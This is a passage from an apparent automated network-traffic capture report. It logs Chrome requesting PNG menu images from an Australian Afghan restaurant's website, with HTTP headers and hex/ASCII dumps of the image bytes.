                                                                                                                                                    Data Ascii: D(=<lV>_q,cRoS1{bq-R7Osli]%UuVrq21r<3`ObK<`W@UN[D`SLpGlh;La9`#vNs1s}hVy%j@.2yRa&.9]}
                                                                                                                                                    2024-10-01 04:26:50 UTC8245INData Raw: 59 9b 4d 94 bb 93 71 e5 51 5f 46 fe 55 f4 f4 bd 1b d3 68 33 1b da c8 c9 6f 75 83 71 0b ab 84 4b 6f b9 a7 55 74 70 e0 75 36 1c 93 d4 4c 99 46 7e 17 94 fd f3 85 ef 9b ce f5 81 3e 66 cd 33 b6 3c f3 cc d3 66 68 3c 59 db bd 6d 6b e1 4a eb 5f 90 dd 29 26 cf b7 64 ef 13 85 32 65 10 b1 90 6f dc 5f f7 9e 84 f5 67 4a 43 bc 75 0e 64 7b 6f 0c c8 71 fd ec 98 9b 9e 4b b7 87 e9 fe 4a db 7e 54 e0 18 ba 62 08 4b 3e 3c 89 2b 99 14 f3 53 7f d9 db d3 4e 4d 1a 86 dd 64 6c 60 62 0d d6 51 fc e0 9a 07 da 53 6b 9d 95 06 4b 7b 85 8f 31 a2 cd dd 5a f9 ff 00 0f 6f 4d d6 7f a5 12 2a 46 09 d5 33 f2 54 1e 37 03 d7 e9 5a eb ff 00 9b b0 63 ee 3b f4 4b 98 1d a1 c3 c2 2d 64 04 ea 67 6e e5 fe 55 f3 57 30 4c 18 54 59 ec 1e c1 97 49 b8 3f 27 de a5 66 cb c5 ce ba cd 7d a6 25 c9 88 a8 f5 75 86
                                                                                                                                                    Data Ascii: YMqQ_FUh3ouqKoUtpu6LF~>f3<fh<YmkJ_)&d2eo_gJCud{oqKJ~TbK><+SNMdl`bQSkK{1ZoM*F3T7Zc;K-dgnUW0LTYI?'f}%u


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    86192.168.2.449855162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:49 UTC388OUTGET /assets/imgs/menu_imges/Mantu.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:49 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:49 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 19:29:20 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 37654
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:49 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:49 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 56 00 00 00 4b 08 06 00 00 00 ea 1e 70 b2 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRVKppHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:49 UTC5499INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:49 UTC16123INData Raw: 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    87192.168.2.449853162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:49 UTC395OUTGET /assets/imgs/menu_imges/Chapli_Kabab.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:49 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:49 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 23:12:14 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 41872
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:49 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:49 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 7f 00 00 00 4b 08 06 00 00 00 59 56 58 a8 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRKYVXpHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:49 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:49 UTC9456INData Raw: fb f9 da 13 df 20 e0 1b c4 12 12 c9 6e c1 48 ef 2e aa ab 0e 47 8f ee c2 d3 1c bc 97 a7 18 98 e9 e7 4c bc 49 f2 6e 9d 46 41 a6 52 30 c9 26 62 34 4b 1d 6c f4 7b 84 df f1 66 ce 3e ff a7 84 4a 4d 4e 74 1f 44 8e f5 32 7b fa 2a 59 55 a2 f3 86 23 3c fd f2 ab 6c 2f e7 b9 e3 80 4c 6b cb a7 da 94 c9 2d af 70 6e 23 47 ab 51 66 68 bb c2 d2 fc 0c 9b 35 87 9e de 18 3f f1 d3 3f ce 23 6f 79 88 5c 29 8f ed f8 c8 92 84 12 ea 44 0a 75 e0 58 4d ac f2 0a be 1a 24 d5 35 88 02 54 6a cd d9 ab 97 a6 7e ca 48 c4 71 64 05 a7 59 01 21 e1 29 32 66 b3 f6 46 35 8f d2 2e 04 34 ad f2 e6 f4 97 56 2e 3f 77 71 fc b6 f7 1c e0 f5 5a f3 9d 86 04 21 24 b4 80 4e 28 9a c1 35 cb 94 36 16 59 38 7f 9a 8c 6c 61 28 3a 85 42 93 a6 a2 d3 99 f4 49 86 65 34 5f a2 66 eb e8 71 9d 97 cf 26 f9 83 3f 2b f0 f6
                                                                                                                                                    Data Ascii: nH.GLInFAR0&b4Kl{f>JMNtD2{*YU#<l/Lk-pn#GQfh5??#oy\)DuXM$5Tj~HqdY!)2fF5.4V.?wqZ!$N(56Y8la(:BIe4_fq&?+


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    88192.168.2.449854162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:49 UTC393OUTGET /assets/imgs/menu_imges/Lamb_Karae.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:49 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:49 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 20:32:48 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 38154
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:49 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:49 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 74 00 00 00 4b 08 06 00 00 00 a1 b6 a3 5f 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRtK_pHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:49 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:49 UTC5738INData Raw: 98 68 6d 73 e0 f6 29 96 b7 07 1c 8b 7d 6e be f7 6e e6 83 39 3e f6 91 3f e0 c2 d2 02 b1 b1 b9 61 52 50 2d 08 ca 63 55 84 ad 78 89 1d ae 6c ae 53 5e f5 b9 79 f7 14 61 6f 9b 4f 7c f0 3c 65 7b 84 d9 c9 29 f2 29 cd f2 72 c8 b9 c5 1e 7b a7 03 bc 42 80 2b 0e 10 9c f9 25 c4 a9 2d 9a f5 7d 5c 7d cf bd c8 67 3f c1 e6 3f fd 45 c6 57 da 58 79 cc 46 e2 13 e5 31 87 0f 1f a0 be eb 2a b6 bb 15 64 61 8e 76 f7 39 ac a0 40 c9 b5 49 30 44 79 8e 90 0a 5b e4 08 9d e1 0a 43 8a 18 56 d9 d2 04 cf 2f f3 d1 3f fe 18 3b cd 06 c2 b6 10 52 d0 e9 f6 28 7a 0e 9b dd 36 e4 19 77 bd ee 41 a6 77 1f dc 48 9b 9b ef 2b 5a 1e ca 29 31 75 cd ed 64 49 c2 4e 73 07 21 0c 6e e0 a3 fb 7d b4 d1 5f d5 70 17 00 c5 a0 78 aa 5c 28 f6 ba ad 0e 12 70 2c 8b 38 4e d1 b9 60 a2 52 c4 68 c1 f9 73 27 d1 51 8b e9
                                                                                                                                                    Data Ascii: hms)}nn9>?aRP-cUxlS^yaoO|<e{))r{B+%-}\}g??EWXyF1*dav9@I0Dy[CV/?;R(z6wAwH+Z)1udINs!n}_px\(p,8N`Rhs'Q


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    89192.168.2.449857162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:50 UTC663OUTGET /assets/imgs/menu_imges/Cauliflower_Curry.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/dineInMenu
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:50 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:50 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 23:10:26 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 36125
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:50 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:50 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 56 00 00 00 4b 08 06 00 00 00 ea 1e 70 b2 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRVKppHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:50 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:50 UTC3357INData Raw: 5f a6 75 f6 15 18 fc 00 b4 e6 e9 79 fa af d8 76 20 ce e8 c3 0d 0e ce c0 28 b0 d0 82 5a 0d 46 8f 41 a5 08 8b df 9c a0 a5 6d 25 df fb e7 dd dc b1 a3 46 12 58 37 08 8f 57 20 f9 35 f8 80 f9 10 6e d0 41 be 6d 23 9e ea 65 2a 73 19 33 de 63 9c f3 8e 2b c9 2e 5a 8f 5f de 4c 6a a0 8b fe 5b 3e c2 84 5e 45 b3 e9 a2 d7 6b 36 3f f0 03 96 0d dc 47 fb a5 eb 38 92 7e 33 b6 f0 31 ed 34 41 a0 d0 22 8a 5d b5 0e 51 5a a3 c3 10 c3 b4 51 52 a2 c2 a8 6c e3 35 43 42 a5 ac 78 3c d1 71 d6 c0 b6 76 f5 f4 1a 96 83 3a 3d 84 ae 23 7d 01 ad a3 52 7a e0 79 04 cd 2a a1 d7 40 9a 16 42 9a a0 34 6e a5 82 76 0f e3 91 a1 d2 7a 1d ed 6b 1f 64 72 3b 54 c7 a0 77 e9 4e a6 75 89 fe 35 c0 a2 09 8e 3f f0 32 af ee b3 19 3f dc 20 29 c1 c8 48 ba 6d 49 36 08 a8 96 a0 2d 09 a2 0a de 48 9d 91 86 cf f0 d1
                                                                                                                                                    Data Ascii: _uyv (ZFAm%FX7W 5nAm#e*s3c+.Z_Lj[>^Ek6?G8~314A"]QZQRl5CBx<qv:=#}Rzy*@B4nvzkdr;TwNu5?2? )HmI6-H


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    90192.168.2.449858162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:50 UTC671OUTGET /assets/imgs/menu_imges/Spicy_Battered_FishFillet.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/dineInMenu
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:50 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:50 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 22:23:04 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 38060
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:50 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:50 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5a 00 00 00 56 08 06 00 00 00 4f 6a 81 79 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRZVOjypHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:50 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
